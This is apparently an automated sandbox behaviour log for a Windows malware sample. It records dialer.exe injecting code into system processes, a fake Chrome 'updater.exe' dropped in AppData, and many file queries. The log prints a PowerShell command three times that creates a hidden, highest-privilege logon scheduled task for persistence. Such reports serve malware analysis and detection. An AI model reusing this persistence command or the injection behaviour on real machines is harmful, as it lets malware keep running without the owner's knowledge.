Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 25CC2A30000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 144B2660000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe base: 2152C890000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1CF49670000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\conhost.exe base: 1988E640000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1F724890000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 222A2280000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 222A22E0000
Source: C:\Users\user\Desktop\ylVAEHbMLf.exe Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
Source: C:\Windows\System32\svchost.exe Process created: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe Process created: unknown unknown
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#lbfytpia#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'htfsfilemanager' /tr '''c:\users\user\appdata\roaming\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'htfsfilemanager' -runlevel 'highest' -force; }
Source: C:\Users\user\Desktop\ylVAEHbMLf.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#lbfytpia#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'htfsfilemanager' /tr '''c:\users\user\appdata\roaming\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'htfsfilemanager' -runlevel 'highest' -force; }
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#lbfytpia#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'htfsfilemanager' /tr '''c:\users\user\appdata\roaming\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'htfsfilemanager' -runlevel 'highest' -force; }
Source: C:\Windows\System32\dialer.exe Code function: 4_2_00007FF78AB31C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 4_2_00007FF78AB31C64
Source: dwm.exe, 0000000A.00000000.1758015033.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 0000000A.00000002.3032503633.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: winlogon.exe, 00000007.00000002.2990549902.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000000.1743987795.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000A.00000000.1758650187.000002BAA8050000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: winlogon.exe, 00000007.00000002.2990549902.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000000.1743987795.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000A.00000000.1758650187.000002BAA8050000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: winlogon.exe, 00000007.00000002.2990549902.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000000.1743987795.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000A.00000000.1758650187.000002BAA8050000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: winlogon.exe, 00000007.00000002.2990549902.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000000.1743987795.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000A.00000000.1758650187.000002BAA8050000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
Source: C:\Windows\System32\winlogon.exe Code function: 7_2_00000225DC6214A0 cpuid 7_2_00000225DC6214A0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
